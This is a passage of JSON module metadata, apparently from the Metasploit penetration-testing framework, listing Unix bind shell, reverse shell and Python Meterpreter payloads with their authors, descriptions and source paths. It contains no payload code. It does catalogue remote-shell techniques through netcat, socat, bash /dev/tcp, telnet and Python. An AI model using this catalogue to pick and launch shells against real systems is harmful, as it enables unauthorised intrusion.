"ref_name": "cmd/unix/bind_r", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_ruby": { - "name": "Unix Command Shell, Bind TCP (via Ruby)", - "fullname": "payload/cmd/unix/bind_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_ruby_ipv6": { - "name": "Unix Command Shell, Bind TCP (via Ruby) IPv6", - "fullname": "payload/cmd/unix/bind_ruby_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_ruby_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_socat_sctp": { - "name": "Unix Command Shell, Bind SCTP (via socat)", - "fullname": "payload/cmd/unix/bind_socat_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-04-27 16:21:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_socat_sctp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_socat_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_socat_udp": { - "name": "Unix Command Shell, Bind UDP (via socat)", - "fullname": "payload/cmd/unix/bind_socat_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_socat_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_stub": { - "name": "Unix Command Shell, Bind TCP (stub)", - "fullname": "payload/cmd/unix/bind_stub", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell (stub only, no payload)", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_stub.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_stub", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_zsh": { - "name": "Unix Command Shell, Bind TCP (via Zsh)", - "fullname": "payload/cmd/unix/bind_zsh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Doug Prostko ", - "Wang Yihang " - ], - "description": "Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is\n often available, please be aware it isn't usually installed by default.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_zsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/generic": { - "name": "Unix Command, Generic Command Execution", - "fullname": "payload/cmd/unix/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Executes the supplied command", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/generic.rb", - "is_install_path": true, - "ref_name": "cmd/unix/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/interact": { - "name": "Unix Command, Interact with Established Connection", - "fullname": "payload/cmd/unix/interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Interacts with a shell on an established socket connection", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/interact.rb", - "is_install_path": true, - "ref_name": "cmd/unix/interact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/pingback_bind": { - "name": "Unix Command Shell, Pingback Bind TCP (via netcat)", - "fullname": "payload/cmd/unix/pingback_bind", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Accept a connection, send a UUID, then exit", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/pingback_bind.rb", - "is_install_path": true, - "ref_name": "cmd/unix/pingback_bind", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/pingback_reverse": { - "name": "Unix Command Shell, Pingback Reverse TCP (via netcat)", - "fullname": "payload/cmd/unix/pingback_reverse", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Creates a socket, send a UUID, then exit", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/pingback_reverse.rb", - "is_install_path": true, - "ref_name": "cmd/unix/pingback_reverse", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/python/exec": { - "name": "Python Exec, Python Execute Command", - "fullname": "payload/cmd/unix/python/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/exec", - "staged": false - }, - "payload_cmd/unix/python/meterpreter/bind_tcp": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", - "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp" - }, - "payload_cmd/unix/python/meterpreter/bind_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp_uuid" - }, - "payload_cmd/unix/python/meterpreter/reverse_http": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_http", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_http" - }, - "payload_cmd/unix/python/meterpreter/reverse_https": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_https", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_https" - }, - "payload_cmd/unix/python/meterpreter/reverse_tcp": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp" - }, - "payload_cmd/unix/python/meterpreter/reverse_tcp_ssl": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell ", - "RageLtMan" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_tcp_ssl", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_ssl" - }, - "payload_cmd/unix/python/meterpreter/reverse_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_uuid" - }, - "payload_cmd/unix/python/meterpreter_bind_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/cmd/unix/python/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/unix/python/meterpreter_reverse_http": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/cmd/unix/python/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/unix/python/meterpreter_reverse_https": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/cmd/unix/python/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/unix/python/meterpreter_reverse_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/cmd/unix/python/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/unix/python/pingback_bind_tcp": { - "name": "Python Exec, Python Pingback, Bind TCP (via python)", - "fullname": "payload/cmd/unix/python/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/unix/python/pingback_reverse_tcp": { - "name": "Python Exec, Python Pingback, Reverse TCP (via python)", - "fullname": "payload/cmd/unix/python/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/unix/python/shell_bind_tcp": { - "name": "Python Exec, Command Shell, Bind TCP (via python)", - "fullname": "payload/cmd/unix/python/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "mumbai" - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_bind_tcp", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_sctp": { - "name": "Python Exec, Command Shell, Reverse SCTP (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_sctp", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_tcp": { - "name": "Python Exec, Command Shell, Reverse TCP (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_tcp_ssl": { - "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_udp": { - "name": "Python Exec, Command Shell, Reverse UDP (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_udp", - "staged": false - }, - "payload_cmd/unix/reverse": { - "name": "Unix Command Shell, Double Reverse TCP (telnet)", - "fullname": "payload/cmd/unix/reverse", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell through two inbound connections", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_awk": { - "name": "Unix Command Shell, Reverse TCP (via AWK)", - "fullname": "payload/cmd/unix/reverse_awk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "espreto ", - "Ulisses Castro ", - "Gabriel Quadros " - ], - "description": "Creates an interactive shell via GNU AWK", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_awk.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_awk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_bash": { - "name": "Unix Command Shell, Reverse TCP (/dev/tcp)", - "fullname": "payload/cmd/unix/reverse_bash", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell via bash's builtin /dev/tcp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/tcp feature.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_bash", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_bash_telnet_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (telnet)", - "fullname": "payload/cmd/unix/reverse_bash_telnet_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via mkfifo and telnet.\n This method works on Debian and other systems compiled\n without /dev/tcp support. This module uses the '-z'\n option included on some systems to encrypt using SSL.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_bash_telnet_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_bash_udp": { - "name": "Unix Command 